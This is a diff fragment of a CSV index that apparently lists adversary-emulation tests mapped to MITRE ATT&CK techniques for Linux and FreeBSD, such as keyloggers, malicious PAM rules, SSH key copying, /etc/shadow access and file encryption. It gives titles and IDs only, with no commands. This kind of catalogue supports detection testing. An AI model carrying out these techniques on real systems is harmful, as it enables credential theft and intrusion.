@@ -162,31 +217,44 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compress
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,X Windows Capture (freebsd),562f3bc2-74e8-46c5-95c7-0e01f9ccc65c,sh
collection,T1113,Screen Capture,5,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freebsd),18397d87-38aa-4443-a098-8a48a8ca5d8d,sh
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
@@ -197,31 +265,45 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a use
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
credential-access,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
credential-access,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with sh on FreeBSD (Local),fa37b633-e097-4415-b2b8-c5bf4c86e423,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,4,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
credential-access,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
credential-access,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
@@ -230,14 +312,20 @@ credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with CP (freebsd),12e4a260-a7fd-4ed8-bf18-1a28c1395775,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,Copy Private SSH Keys with rsync (freebsd),922b1080-0b95-42b0-9585-b9a5ea0af044,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",4,"Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
@@ -248,30 +336,42 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1007,System Service Discovery,4,System Service Discovery - service,b2e1c734-7336-40f9-b970-b04731cbaf8a,sh
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
discovery,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery - FreeBSD,77e468a6-3e5c-45a1-9948-c4b5603747cb,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,FreeBSD VM Check via Kernel Modules,eefe6a49-d88b-41d8-8fc2-b46822da90d3,sh
discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh
discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (freebsd),7625b978-4efd-47de-8744-add270374bee,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - FreeBSD,a7893624-a3d7-4aed-9676-80498f31820f,sh
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,4,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,5,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
@@ -280,13 +380,16 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,4,Disco
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d2791d72-b67f-4615-814f-ec824a91f514,sh
discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan Nmap for FreeBSD,f03d59dc-0e3b-428a-baeb-3499552c7048,sh
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
@@ -298,11 +401,14 @@ impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/ma
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - FreeBSD/Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,sh
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - FreeBSD,7b1cee42-320f-4890-b056-d65c8b884ba5,sh
impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
@@ -316,18 +422,26 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,sh
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
